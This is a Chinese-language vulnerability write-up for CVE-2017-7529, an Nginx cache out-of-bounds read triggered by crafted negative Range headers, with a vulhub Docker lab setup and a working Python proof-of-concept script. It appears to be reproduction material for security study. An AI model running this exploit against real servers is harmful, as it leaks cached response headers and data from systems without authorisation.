menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Nginx chevron_right Nginx越界读取缓存漏洞 CVE-2017-7529.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Nginx越界读取缓存漏洞 CVE-2017-7529.md
    1.82 KB / 2021-04-15 12:15:18
        # Nginx越界读取缓存漏洞 CVE-2017-7529
    
    ## 漏洞描述
    
    Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。
    
    如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
    
    ## 影响版本
    
    > [!NOTE]
    >
    > Nginx version 0.5.6 - 1.13.2
    
    ## 环境搭建
    
    ```
    git clone https://github.com/vulhub/vulhub.git
    cd vulhub/nginx/CVE-2017-7529
    docker-compose up -d
    ```
    
    访问 http://xxx.xxx.xxx.xxx:8080 正常即可
    
    ![](image/nginx-1.png)
    
    ## 漏洞复现
    
    使用目录下的POC进行验证
    
    ```
    python poc.py http://xxx.xxx.xxx.xxx:8080/
    ```
    
    ![](image/nginx-2.png)
    
    ## 漏洞利用POC
    
    ```python
    #!/usr/bin/env python
    import sys
    import requests
    
    if len(sys.argv) < 2:
        print("%s url" % (sys.argv[0]))
        print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
        sys.exit()
    
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
    }
    offset = 605
    url = sys.argv[1]
    file_len = len(requests.get(url, headers=headers).content)
    n = file_len + offset
    headers['Range'] = "bytes=-%d,-%d" % (
        n, 0x8000000000000000 - n)
    
    r = requests.get(url, headers=headers)
    ```
    
    
    
    links
    file_download